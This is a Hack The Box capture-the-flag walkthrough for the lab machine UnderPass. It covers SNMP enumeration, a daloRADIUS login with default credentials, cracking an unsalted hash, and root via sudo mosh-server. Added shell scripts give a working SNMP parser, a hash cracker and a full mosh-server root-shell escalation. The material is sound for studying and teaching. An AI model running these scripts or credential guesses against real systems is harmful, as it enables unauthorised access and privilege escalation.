UnderPass
Intro.
Hello everyone. Today we have the latest Hack The Box machine, UnderPass. Let's get right into it.
Enumeration.
Port scanning.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
| 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.52 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
As we can see, only SSH (22) and HTTP (80) are open over TCP. The OS guess is unreliable because nmap found no closed port to fingerprint against, so it is not worth reading much into it.
HTTP
I enumerated everything over HTTP: directory brute forcing, path traversal, common Apache misconfigurations, subdomains.
I also found a CVE for this Apache version (an HTTP request smuggling issue).
But nothing was there; the default Apache page is a dead end.
UDP ports.
UDP ports are something I forgot to enumerate, but when I did I found this.
PORT STATE SERVICE
161/udp open snmp
1812/udp open|filtered radius
1813/udp open|filtered radacct
We have SNMP open. Let's see what we can do with it.
Enumerate SNMP.
After some searching I came across a useful tool called snmpbulkwalk, which showed the following results.

For more information about SNMP you can refer to this.
From the above image we can tell a few things:
There is a user called steve.
We have what is called a daloRADIUS server.
What is a daloRADIUS server? It is a web management front end for FreeRADIUS, which also explains the RADIUS ports (1812/udp and 1813/udp) in the UDP scan.
You can find more here.
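The SNMP step, as an added example that is not from the original writeup: the walk itself, plus a small parser that pulls the system-group fields (sysDescr, sysContact, sysName, sysLocation) out of the output, since those are where the username and the daloRADIUS hint came from. It assumes the community string "public" and the hostname underpass.htb; the sample output in the comments is constructed, not the box's real output.

```shell
#!/bin/sh
# Added example (not from the writeup). Assumes community "public" and
# that underpass.htb resolves to the target; adjust both to taste.

# Run the walk. -v2c is needed for bulk requests. -On prints numeric OIDs so
# the parser below works even without MIB files installed; -q drops the
# "= TYPE:" decoration and leaves one "OID value" pair per line.
snmp_walk() {
    snmpbulkwalk -v2c -c public -Onq "$1" 2>/dev/null
}

# Read "OID value" lines on stdin and print the system-group fields that most
# often leak names and purpose. OIDs are from SNMPv2-MIB (.1.3.6.1.2.1.1.*).
snmp_summary() {
    sed -n \
        -e 's/^\.1\.3\.6\.1\.2\.1\.1\.1\.0 /sysDescr: /p' \
        -e 's/^\.1\.3\.6\.1\.2\.1\.1\.4\.0 /sysContact: /p' \
        -e 's/^\.1\.3\.6\.1\.2\.1\.1\.5\.0 /sysName: /p' \
        -e 's/^\.1\.3\.6\.1\.2\.1\.1\.6\.0 /sysLocation: /p'
}

# The local part of an e-mail address in sysContact is usually a real account
# name on the box (here it would be "steve"). Prints nothing if none is found.
snmp_contact_user() {
    snmp_summary | sed -n 's/^sysContact: //p' \
        | grep -o '[A-Za-z0-9._-]*@' | head -n 1 | tr -d '@'
}

# Usage against a live target:
#   snmp_walk underpass.htb | snmp_summary
#   snmp_walk underpass.htb | snmp_contact_user
# Constructed sample of what the walk looks like with -Onq:
#   .1.3.6.1.2.1.1.4.0 steve@underpass.htb
#   .1.3.6.1.2.1.1.5.0 daloradius server
```

Walking with numeric OIDs costs nothing and keeps the parser independent of whichever MIBs happen to be installed on the attacking machine.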
Since we have a username, we can try to log in with it and guess the password. The login page is at http://underpass.htb/daloradius/app/operators/login.php
After a few guesses at the login I tried the default credentials, and they actually worked.
The default creds are:
Administrator/radius

Shell As svcMosh
As you can see in the image above, in the green box we have a user. Let's look closer.

As you can see in the image, the user has a password. I tried to log in with it but had no luck, so I was sure this value was a hash, and I used CrackStation to crack it. CrackStation is a lookup table, so a hit there also tells you the password was stored as a plain, unsalted hash.

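The cracking step done offline, as an added example that is not part of the writeup: pick the digest from the hex length, then test each candidate. The hash from the screenshot is not reproduced; the hashes and candidate words used here are constructed for the example (the md5/sha1 of the word "password"). It only works for unsalted hashes, which is exactly the case where a lookup service like CrackStation succeeds too.

```shell
#!/bin/sh
# Added example (not from the writeup). Needs coreutils md5sum/sha1sum/sha256sum.

# Map a hex digest to the tool that produces it, by length alone.
# Fails for anything that is not pure hex of a known length.
hash_tool() {
    case "$1" in *[!0-9a-fA-F]*|"") return 1 ;; esac
    case ${#1} in
        32) echo md5sum ;;
        40) echo sha1sum ;;
        64) echo sha256sum ;;
        *)  return 1 ;;
    esac
}

# crack HASH CANDIDATE... : print the first candidate whose digest matches.
# Returns non-zero when nothing matches or the hash type is unknown.
crack() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    tool=$(hash_tool "$target") || return 1
    shift
    for cand in "$@"; do
        # printf, not echo: echo would append a newline and change the digest.
        if [ "$(printf '%s' "$cand" | "$tool" | cut -d' ' -f1)" = "$target" ]; then
            printf '%s\n' "$cand"
            return 0
        fi
    done
    return 1
}

# crack_file HASH WORDLIST : same, one candidate per line (e.g. rockyou.txt).
crack_file() {
    hash=$1
    while IFS= read -r cand || [ -n "$cand" ]; do
        crack "$hash" "$cand" && return 0
    done < "$2"
    return 1
}

# Constructed sample: md5("password") with a few guesses.
SAMPLE_MD5=5f4dcc3b5aa765d61d8327deb882cf99
# crack "$SAMPLE_MD5" radius steve123 password   -> prints "password"
```

If the value pulled from the database had a prefix or a salt (a `$1$`/`$6$` crypt string, for instance) the length test above fails on purpose; that is the signal to reach for hashcat with the proper mode instead of a lookup table.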
Let's SSH in.

As you can see, we can read the user flag.
Shell as Root.
To get a root shell, let's see what sudo permissions we have with "sudo -l".

So we can run something called mosh-server, but what is that?
Going through the official page, we find that there is also a tool called mosh-client, which lets us connect to a mosh-server. It also says that mosh-server does not need to run as root, so being allowed to run it with sudo means something is wrong.
In the mosh-client section of the official page we can also see that a base64 key is generated when we start a mosh-server session; we set that as the MOSH_KEY environment variable, which mosh-client requires when connecting to the server.

But where can we find it?

Here we can use this key as our MOSH_KEY and then connect with mosh-client, either from our own machine or from the target itself, and we get a root shell. The key is the only thing that authenticates the session: because the server was started via sudo, whoever holds that key and can reach the UDP port gets the root session.




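The whole escalation as one script, added here as an example and not taken from the writeup. It assumes what the screenshots show: sudo -l allows /usr/bin/mosh-server as root without a password, and mosh-client is available on the target. The parser is separated out because the "MOSH CONNECT <port> <key>" line is the only thing you need from the server's output; the sample line in the comment is constructed.

```shell
#!/bin/sh
# Added example (not from the writeup). Assumes:
#   sudo -l  ->  (ALL) NOPASSWD: /usr/bin/mosh-server
# and a mosh-client binary on the same host.

# mosh-server prints one line "MOSH CONNECT <udp-port> <base64-key>" on
# stdout and then detaches into the background. Return "port key".
parse_mosh_connect() {
    fields=$(printf '%s\n' "$1" | sed -n 's/^MOSH CONNECT //p' | head -n 1)
    # shellcheck disable=SC2086  (word-splitting is the point here)
    set -- $fields
    [ "$#" -eq 2 ] || return 1
    printf '%s %s\n' "$1" "$2"
}

# Start the server as root, bound to loopback only (-i 127.0.0.1) so the key
# is never usable from the network, then attach as the unprivileged user.
mosh_root_shell() {
    out=$(sudo /usr/bin/mosh-server new -i 127.0.0.1) || return 1
    fields=$(parse_mosh_connect "$out") || return 1
    port=${fields% *}
    key=${fields#* }
    # MOSH_KEY is the session secret; mosh-client reads it from the environment.
    MOSH_KEY="$key" mosh-client 127.0.0.1 "$port"
}

# Constructed sample of the line we parse:
#   MOSH CONNECT 60001 7F/Hhu4aLpLDdJrO9uIn0w
# Run the escalation only when asked, so the file can be sourced safely:
#   RUN_MOSH=1 sh ./mosh_root.sh
if [ "${RUN_MOSH:-0}" = 1 ]; then
    mosh_root_shell
fi
```

Binding to 127.0.0.1 is the one deliberate choice here: the default listener is reachable from outside, and since the key is the only credential, leaving a root session open on a routable UDP port is a worse state than the box was in before.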
Conclusion
In the end this machine was a lot of fun. It is an easy machine, but it has a lot of new things, from the initial access to the privilege escalation. Quite fun and educational.